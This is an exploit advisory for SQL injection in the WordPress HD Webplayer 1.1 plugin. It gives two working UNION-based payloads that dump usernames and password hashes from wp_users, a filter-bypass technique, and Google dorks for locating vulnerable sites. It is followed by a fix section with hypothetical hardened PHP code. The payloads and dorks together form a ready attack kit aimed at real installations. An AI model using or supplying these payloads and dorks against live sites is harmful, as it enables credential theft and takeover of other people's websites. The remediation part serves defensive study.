Title: WordPress HD Webplayer 1.1 SQL Injection
Author: JoinSe7en
Vendor homepage:
Software link:
Affected version: 1.1
Tested on: Windows 7, Backtrack 5 r3
+----------------------------------------------------------------------+
| Vulnerability 1 - config.php |
+----------------------------------------------------------------------+
# Location:
/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]
# Exploit Code (the id parameter is placed unfiltered into the query; the /*!...*/ MySQL version-comment form of UNION/SELECT gets past naive keyword filters, and the column count must match the original SELECT, so adjust it if the query errors):
config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different
+----------------------------------------------------------------------+
| Vulnerability 2 - playlist.php |
+----------------------------------------------------------------------+
# Location:
/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]
# Exploit Code (same technique against the videoid parameter; here the injected column is the first one, and again the count must match the original query):
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different
Three search dorks for locating installations:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Fix: validate the id and videoid parameters before they reach the query. Both are numeric identifiers, so cast them to an integer (or reject anything that is not a digit string) and bind them through a prepared statement; a keyword blacklist on UNION/SELECT alone is not enough, since the /*!UNION*/ form above is written precisely to get around such filters.
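The fix described above, as an added example rather than the plugin's own code: a hypothetical version of the lookup config.php and playlist.php are assumed to perform, first in the vulnerable string-concatenation form and then hardened with integer validation and $wpdb->prepare(). The table name hd_webplayer_videos, the column names, the function names and the assumption that the scripts bootstrap WordPress (so $wpdb, absint() and wp_die() exist) are all assumptions, not facts from the advisory.

```php
<?php
// Added example, not the HD Webplayer plugin's code. Table and column names
// (hd_webplayer_videos, id) and the function names are assumptions.
// Assumes WordPress has been loaded (e.g. require_once '../../../wp-load.php')
// so that $wpdb, absint() and wp_die() are available.

// --- Vulnerable pattern (assumed): the GET parameter is dropped straight into
// the SQL string, so ?id=1 UNION SELECT ... is executed exactly as supplied.
function hdwp_get_video_vulnerable( $wpdb, $param ) {
    $value = $_GET[ $param ];
    $sql   = "SELECT * FROM {$wpdb->prefix}hd_webplayer_videos WHERE id = $value";
    return $wpdb->get_row( $sql );
}

// --- Hardened version, usable for both config.php ($param = 'id') and
// playlist.php ($param = 'videoid'):
//  1. reject anything that is not a plain digit string (this kills the
//     "1 UNION SELECT ..." payload before any SQL is built);
//  2. cast to a non-negative integer with absint();
//  3. bind the value with $wpdb->prepare() using the %d placeholder, so the
//     value is interpolated as an integer and never as SQL.
function hdwp_get_video_safe( $wpdb, $param ) {
    if ( ! isset( $_GET[ $param ] ) || ! ctype_digit( (string) $_GET[ $param ] ) ) {
        wp_die( 'Invalid video id', 'Bad Request', array( 'response' => 400 ) );
    }
    $id  = absint( $_GET[ $param ] );
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}hd_webplayer_videos WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}

// Usage in playlist.php (hypothetical):
//   $video = hdwp_get_video_safe( $wpdb, 'videoid' );
//   if ( null === $video ) { wp_die( 'Not found', 'Not Found', array( 'response' => 404 ) ); }
```

The ctype_digit() check is what closes the hole by itself; the prepared statement is kept as well so that the query stays safe if the parameter is ever changed to a non-numeric type. Because the two scripts are requested directly under /wp-content/plugins/, they only have $wpdb if they load WordPress themselves; a script that talks to MySQL through its own connection should apply the same validation and use mysqli prepared statements instead.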